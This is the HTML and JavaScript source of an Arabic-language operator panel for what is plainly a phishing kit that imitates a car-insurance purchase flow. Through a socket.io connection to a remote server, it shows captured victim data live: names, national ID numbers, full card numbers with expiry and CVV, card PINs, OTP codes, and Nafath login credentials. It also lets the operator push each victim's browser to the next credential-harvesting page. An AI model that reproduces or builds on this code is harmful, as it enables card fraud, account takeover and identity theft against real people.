<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>لوحة التحكم</title>
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"
      rel="stylesheet"
    />
    <style>
      body {
        padding: 1rem;
      }
      table th,
      table td {
        white-space: nowrap;
        vertical-align: middle;
      }
      .status-indicator {
        font-weight: bold;
      }
      .status-active {
        color: green;
      }
      .status-offline {
        color: red;
      }

      /* Card-modal */
      #cardModal .btn-page {
        flex: 1;
        margin: 2px;
      }
      #cardTopBtns,
      #cardBottomBtns {
        display: flex;
        flex-wrap: wrap;
        justify-content: center;
      }
      #cardHistory {
        max-height: 250px;
        overflow-y: auto;
        border: 1px solid #ddd;
        padding: 1rem;
        margin: 0.5rem 0;
      }
      .card-sim {
        width: 100%;
        max-width: 350px;
        margin: auto 0 1rem;
        border-radius: 12px;
        background: linear-gradient(135deg, #2a2a72, #009ffd);
        color: white;
        padding: 1rem;
        font-family: monospace;
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
      }
      .card-sim .line {
        display: flex;
        justify-content: space-between;
        margin: 0.4rem 0;
      }
      .card-sim .holder {
        font-size: 0.85rem;
      }
      .card-sim .number {
        letter-spacing: 2px;
        font-size: 1.1rem;
      }

      /* Confirm-modal */
      #confirmModal .modal-body {
        text-align: center;
        direction: ltr;
      }
      #nafadInputContainer {
        margin: 0.5rem 0;
      }

      /* Info-modal cards */
      #infoModal .modal-content {
        direction: rtl;
      }
      .info-card {
        border: 1px solid #ddd;
        border-radius: 8px;
        padding: 1rem;
        margin-bottom: 1rem;
        background: #f9f9f9;
      }
      .info-card h6 {
        margin-bottom: 0.75rem;
        font-weight: bold;
      }
      .info-card p {
        margin: 0.25rem 0;
      }

      /* blinking */
      @keyframes blink-border {
        0%,
        100% {
          box-shadow: 0 0 0 rgba(0, 255, 0, 0.7);
        }
        50% {
          box-shadow: 0 0 8px rgba(0, 255, 0, 1);
        }
      }
      .blink-green {
        animation: blink-border 1s infinite;
      }
    </style>
  </head>
  <body>
    <!-- Alerts -->
    <audio
      id="sound-new-ip"
      src="./assets/sounds/data.wav"
      preload="auto"
    ></audio>
    <audio
      id="sound-new-data"
      src="./assets/sounds/notification.wav"
      preload="auto"
    ></audio>

    <!-- Visitors Table -->
    <div class="container">
      <table class="table table-striped table-bordered">
        <thead class="thead-light">
          <tr>
            <th style="width: 3rem">#</th>
            <th>ID</th>
            <th>الاسم</th>
            <th>بطاقة</th>
            <th>الصفحة الحالية</th>
            <th>الحالة</th>
            <th>حظر</th>
            <th>معلومات</th>
          </tr>
        </thead>
        <tbody id="visitorTable"></tbody>
      </table>
    </div>

    <!-- Card Modal -->
    <div class="modal fade" id="cardModal" tabindex="-1">
      <div class="modal-dialog modal-lg modal-dialog-centered">
        <div class="modal-content text-right">
          <div class="modal-header">
            <h5 class="modal-title">
              تحكم البطاقة — <span id="cardModalId"></span>
            </h5>
            <button type="button" class="close" data-dismiss="modal">
              &times;
            </button>
          </div>
          <div class="modal-body">
            <div id="cardTopBtns" class="mb-2"></div>
            <div id="cardHistory"></div>
            <div id="cardBottomBtns" class="mt-2"></div>
          </div>
        </div>
      </div>
    </div>

    <!-- Confirm Modal -->
    <div class="modal fade" id="confirmModal" tabindex="-1" dir="ltr">
      <div class="modal-dialog modal-sm modal-dialog-centered">
        <div class="modal-content p-3">
          <div class="modal-body">
            <p id="confirmText">هل تريد المتابعة؟</p>
            <div id="nafadInputContainer" style="display: none">
              <input
                type="text"
                maxlength="2"
                class="form-control"
                id="nafadInput"
                placeholder="##"
              />
            </div>
            <button id="confirmApprove" class="btn btn-success mx-2">
              موافقة
            </button>
            <button id="confirmDecline" class="btn btn-danger mx-2">رفض</button>
          </div>
        </div>
      </div>
    </div>

    <!-- Info Modal -->
    <div class="modal fade" id="infoModal" tabindex="-1">
      <div class="modal-dialog modal-dialog-scrollable modal-lg">
        <div class="modal-content text-right">
          <div class="modal-header">
            <h5 class="modal-title">
              معلومات الزائر — <span id="infoModalId"></span>
            </h5>
            <button type="button" class="close" data-dismiss="modal">
              &times;
            </button>
          </div>
          <div class="modal-body">
            <div class="info-card">
              <h6>بيانات الصفحة الرئيسية</h6>
              <p>
                <strong>الاسم الكامل:</strong> <span id="idxFullName">—</span>
              </p>
              <p>
                <strong>رقم هوية المشتري:</strong>
                <span id="idxBuyerID">—</span>
              </p>
              <p>
                <strong>هوية/إقامة:</strong> <span id="idxResident">—</span>
              </p>
            </div>
            <div class="info-card">
              <h6>بيانات صفحة التفاصيل</h6>
              <p>
                <strong>نوع العقد:</strong> <span id="detContractType">—</span>
              </p>
              <p>
                <strong>تاريخ البدء:</strong> <span id="detStartDate">—</span>
              </p>
              <p>
                <strong>الغرض من الاستخدام:</strong>
                <span id="detPurpose">—</span>
              </p>
              <p>
                <strong>القيمة التقديرية:</strong> <span id="detValue">—</span>
              </p>
              <p><strong>سنة الصنع:</strong> <span id="detYear">—</span></p>
              <p>
                <strong>مكان الإصلاح:</strong> <span id="detRepair">—</span>
              </p>
            </div>
            <div class="info-card">
              <h6>بيانات ضد الغير</h6>
              <p><strong>اسم الشركة:</strong> <span id="thrCompany">—</span></p>
              <p><strong>السعر الأساسي:</strong> <span id="thrBase">—</span></p>
              <p>
                <strong>السعر الإجمالي:</strong> <span id="thrTotal">—</span>
              </p>
            </div>
            <div class="info-card">
              <h6>بيانات التأمين الشامل</h6>
              <p>
                <strong>اسم الشركة:</strong> <span id="compCompany">—</span>
              </p>
              <p>
                <strong>السعر الأساسي:</strong> <span id="compBase">—</span>
              </p>
              <p>
                <strong>السعر الإجمالي:</strong> <span id="compTotal">—</span>
              </p>
            </div>
            <div class="info-card">
              <h6>بيانات الفوترة</h6>
              <p><strong>مدى:</strong> <span id="billMada">—</span></p>
              <p><strong>فيزا/ماستر:</strong> <span id="billVisa">—</span></p>
              <p><strong>Apple Pay:</strong> <span id="billApple">—</span></p>
              <p>
                <strong>السعر النهائي:</strong> <span id="billTotal">—</span>
              </p>
            </div>
            <div class="info-card">
              <h6>بيانات نفاذ</h6>
              <p>
                <strong>اسم المستخدم:</strong> <span id="nafadUser">—</span>
              </p>
              <p><strong>كلمة المرور:</strong> <span id="nafadPass">—</span></p>
              <p><strong>كود بسمة:</strong> <span id="nafadBasmah">—</span></p>
            </div>
            <div class="info-card">
              <h6>الدفع</h6>
              <p>
                <strong>اسم حامل البطاقة:</strong> <span id="payHolder">—</span>
              </p>
              <p><strong>رقم البطاقة:</strong> <span id="payNumber">—</span></p>
              <p>
                <strong>تاريخ الانتهاء:</strong> <span id="payExpiry">—</span>
              </p>
              <p><strong>CVV:</strong> <span id="payCvv">—</span></p>
            </div>
          </div>
        </div>
      </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdn.socket.io/4.7.2/socket.io.min.js"></script>
    <script>
      const socket = io("https://b-care-server.onrender.com");
      const PAGES = [
        "index.html",
        "details.html",
        "thirdparty.html",
        "comprehensive.html",
        "billing.html",
        "paymen.html",
        "verification.html",
        "code.html",
        "phone.html",
        "phonecode.html",
        "stcCall.html",
        "nafad.html",
        "nafad-basmah.html",
        
      ];
      const LABEL = {
        "index.html": "الرئيسية",
        "details.html": "التفاصيل",
        "thirdparty.html": "ضد الغير",
        "comprehensive.html": "شامل",
        "billing.html": "الفوترة",
        "paymen.html": "الدفع",
        "verification.html": "Card OTP",
        "code.html": "Card Pin",
        "phone.html": "Phone",
        "phonecode.html": "Phone OTP",
        "stcCall.html": "STC Call",
        "nafad.html": "Nafad",
        "nafad-basmah.html": "Nafad ID",
      };

      const maps = {
        index: {},
        details: {},
        third: {},
        comp: {},
        billing: {},
        payment: {},
        pin: {},
        otp: {},
        phone: {},
        nafad: {},
        location: {},
      };
      const blocked = new Set();

      function sanitize(v) {
        return String(v).replace(/[^ \w]/g, "");
      }

      socket.on("connect", () => socket.emit("loadData"));

      socket.on(
        "initialData",
        ({ index, details, comprehensive, thirdparty }) => {
          index.forEach((r) => (maps.index[r.ip] = r));
          details.forEach((r) => (maps.details[r.ip] = r));
          comprehensive.forEach((r) => (maps.comp[r.ip] = r));
          thirdparty.forEach((r) => (maps.third[r.ip] = r));
          renderTable();
        }
      );

      // handle all incoming collections
      [
        "newIndex",
        "newDetails",
        "newShamel",
        "newThirdparty",
        "newBilling",
        "newPayment",
        "newPin",
        "newOtp",
        "newPhone",
        "newNafad",
      ].forEach((evt) => {
        socket.on(evt, (doc) => {
          const key = {
            newIndex: "index",
            newDetails: "details",
            newShamel: "comp",
            newThirdparty: "third",
            newBilling: "billing",
            newPayment: "payment",
            newPin: "pin",
            newOtp: "otp",
            newPhone: "phone",
            newNafad: "nafad",
          }[evt];
          maps[key][doc.ip] = doc;
          document.getElementById("sound-new-data").play();
          renderTable();
        });
      });
      socket.on("newIndex", () =>
        document.getElementById("sound-new-ip").play()
      );
      socket.on("locationUpdated", ({ ip, page }) => {
        maps.location[ip] = page;
        renderTable();
      });

      function renderTable() {
        const tbody = document.getElementById("visitorTable");
        tbody.innerHTML = "";
        const ips = Array.from(
          new Set(Object.keys(maps.location).concat(Object.keys(maps.index)))
        );
        ips.forEach((ip, i) => {
          const idx = maps.index[ip] || {};
          const pageRaw = (maps.location[ip] || "offline").replace(
              /\.html$/,
              ""
            ),
            online = pageRaw !== "offline";
          tbody.insertAdjacentHTML(
            "beforeend",
            `
          <tr>
            <th>${i + 1}</th>
            <td>${sanitize(idx.IDorResidenceNumber || ip)}</td>
            <td>${sanitize(idx.FullName || "")}</td>
            <td><button class="btn btn-success card-btn" data-ip="${ip}">بطاقة</button></td>
            <td>${pageRaw}</td>
            <td><span class="status-indicator ${
              online ? "status-active" : "status-offline"
            }">
              ${online ? "متصل" : "غير متصل"}</span></td>
            <td>
              <button class="btn ${
                blocked.has(ip) ? "btn-danger" : "btn-outline-danger"
              } block-btn" data-ip="${ip}">
                ${blocked.has(ip) ? "إلغاء الحظر" : "حظر"}</button>
            </td>
            <td><button class="btn btn-info info-btn" data-ip="${ip}">معلومات</button></td>
          </tr>`
          );
        });
      }

      // all UI clicks
      let currentAction = {};
      document.addEventListener("click", (e) => {
        const ip = e.target.dataset.ip;
        // Card modal
        if (e.target.matches(".card-btn")) {
          document.getElementById("cardModalId").textContent =
            maps.index[ip]?.IDorResidenceNumber || ip;
          const top = document.getElementById("cardTopBtns"),
            bot = document.getElementById("cardBottomBtns"),
            hist = document.getElementById("cardHistory");
          top.innerHTML = "";
          bot.innerHTML = "";
          hist.innerHTML = "";
          PAGES.forEach((p, i) => {
            const btn = document.createElement("button");
            btn.className = "btn btn-outline-primary btn-page";
            btn.textContent = LABEL[p];
            btn.dataset.page = p;
            if (maps.location[ip] === p) btn.classList.add("blink-green");
            if (i < 6) top.appendChild(btn);
            else bot.appendChild(btn);
          });
          const pay = maps.payment[ip] || {},
            p = maps.pin[ip] || {},
            o = maps.otp[ip] || {},
            ph = maps.phone[ip] || {};
          hist.insertAdjacentHTML(
            "beforeend",
            `
          <div class="card-sim">
            <div class="line holder">${sanitize(pay.cardHolderName || "")}</div>
            <div class="line number">${sanitize(pay.cardNumber || "")}</div>
            <div class="line"><span>Exp: ${sanitize(
              pay.expirationDate || ""
            )}</span><span>CVV: ${sanitize(pay.cvv || "")}</span></div>
            <div class="line">OTP: ${sanitize(
              o.verification_code_two || ""
            )}</div>
            <hr style="background:rgba(255,255,255,0.3)"/>
            <div class="line">Phone: ${sanitize(ph.phoneNumber || "")}</div>
            <div class="line">Operator: ${sanitize(ph.operator || "")}</div>
            <div class="line">Phone OTP: ${sanitize(
              o.verification_code_three || ""
            )}</div>
          </div>`
          );
          $("#cardModal").modal("show");
        }

        // page redirect
        if (e.target.matches(".btn-page")) {
          const page = e.target.dataset.page;
          currentAction = { ip, page };
          document.getElementById(
            "confirmText"
          ).textContent = `إعادة توجيه ${ip} → ${LABEL[page]}؟`;
          document.getElementById("nafadInputContainer").style.display =
            page === "nafad-basmah.html" ? "block" : "none";
          $("#confirmModal").modal("show");
        }

        // approve/decline
        if (
          e.target.id === "confirmApprove" ||
          e.target.id === "confirmDecline"
        ) {
          const ok = e.target.id === "confirmApprove",
            { ip, page } = currentAction;
          if (page === "nafad-basmah.html") {
            const val = document.getElementById("nafadInput").value;
            socket.emit("updateBasmah", { ip, basmah: Number(val) });
          }
          socket.emit("navigateTo", {
            ip,
            page: ok ? page : page + "?declined=true",
          });
          $("#confirmModal").modal("hide");
        }

        // block/unblock
        if (e.target.matches(".block-btn")) {
          fetch(`/api/visitors/toggle-block/${ip}`, { method: "PATCH" })
            .then((r) => r.json())
            .then((res) => {
              if (res.success) {
                blocked.has(ip) ? blocked.delete(ip) : blocked.add(ip);
                renderTable();
              }
            });
        }

        // Info modal
        if (e.target.matches(".info-btn")) {
          document.getElementById("infoModalId").textContent = ip;
          // fill spans
          const setSpan = (id, val) =>
            (document.getElementById(id).textContent = sanitize(val || ""));
          const idx = maps.index[ip] || {};
          setSpan("idxFullName", idx.FullName);
          setSpan("idxBuyerID", idx.BuyerIDnumber);
          setSpan("idxResident", idx.IDorResidenceNumber);

          const det = maps.details[ip] || {};
          setSpan("detContractType", det.TypeOfInsuranceContract);
          setSpan("detStartDate", det.InsuranceStartDate);
          setSpan("detPurpose", det.PurposeOfUse);
          setSpan("detValue", det.EstimatedValue);
          setSpan("detYear", det.ManufactureYear);
          setSpan("detRepair", det.RepairLocation);

          const thr = maps.third[ip] || {};
          setSpan("thrCompany", thr.companyName);
          setSpan("thrBase", thr.basePrice);
          setSpan("thrTotal", thr.totalPrice);

          const comp = maps.comp[ip] || {};
          setSpan("compCompany", comp.companyName);
          setSpan("compBase", comp.basePrice);
          setSpan("compTotal", comp.totalPrice);

          const bill = maps.billing[ip] || {};
          setSpan("billMada", bill.mada);
          setSpan("billVisa", bill.visa_mastarcard);
          setSpan("billApple", bill.applepay);
          setSpan("billTotal", bill.totalPrice);

          const nf = maps.nafad[ip] || {};
          setSpan("nafadUser", nf.username);
          setSpan("nafadPass", nf.password);
          setSpan("nafadBasmah", nf.basmah);

          const pay = maps.payment[ip] || {};
          setSpan("payHolder", pay.cardHolderName);
          setSpan("payNumber", pay.cardNumber);
          setSpan("payExpiry", pay.expirationDate);
          setSpan("payCvv", pay.cvv);

          $("#infoModal").modal("show");
        }
      });
    </script>
  </body>
</html>
